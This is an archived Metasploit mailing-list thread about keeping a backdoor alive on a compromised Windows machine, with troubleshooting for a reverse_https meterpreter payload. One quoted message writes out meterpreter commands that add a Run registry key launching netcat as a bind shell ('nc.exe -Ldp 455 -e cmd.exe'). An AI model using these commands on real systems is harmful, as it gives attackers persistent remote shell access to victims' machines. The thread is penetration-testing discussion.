Metasploit mailing list archives
Re: Persistent Backdoor
From: Tom Van de Wiele <tom.vandewiele () gmail com>
Date: Sat, 9 Oct 2010 23:09:10 +0200
Hi,

Sort of dropping into this thread, my apologies.

Persistence.rb is really recommended instead of setting regkeys individually. Unless the victim has checks for the regkeys set by persistence.rb of course. I have a little issue with it, in that it runs great with e.g. a windows/meterpreter/reverse_tcp payload, but has anyone experienced problems with running it with a windows/meterpreter/reverse_https payload?

I'm doing a file format client directed attack with another box as an exploit/multi/handler and on that box I see the reverse connection coming in from the victim to my multi/handler. I see a TCP handshake being performed but then no data being sent by the victim. After which the connection times out.

I'm using reverse_https with 443/tcp as the client connecting back has to traverse a proxy server. I have tried this in another testlab with no proxy server in between (2 machines sitting in the same LAN) but I get the same behavior.

Using ruby1.9.1 and build svn r10585 from 2 days ago.

Thank you for sharing your experiences or any pointers on how I can diagnose this further.

On Mon, Oct 4, 2010 at 3:40 PM, David Kennedy <kennedyd013 () gmail com> wrote:
Why not use run persistence from meterpreter?

On Oct 4, 2010 9:36 AM, "Eric" <dkn4a1 () gmail com> wrote:

Hi,

meterpreter > reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d "C:\windows\system32\nc.exe -Ldp 455 -e cmd.exe"

nor

meterpreter > reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d "C:\\windows\\system32\\nc.exe -Ldp 455 -e cmd.exe"

doesn't seem to work for me :-(
_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
Current thread:
- Persistent Backdoor Eric (Oct 04)
- Re: Persistent Backdoor David Kennedy (Oct 04)
- Re: Persistent Backdoor John Nash (Oct 04)
- Re: Persistent Backdoor Eric (Oct 05)
- Re: Persistent Backdoor Tom Van de Wiele (Oct 09)
- Re: Persistent Backdoor Miguel Rios (Oct 10)
- Re: Persistent Backdoor Sherif El-Deeb (Oct 10)
- Re: Persistent Backdoor David Kennedy (Oct 04)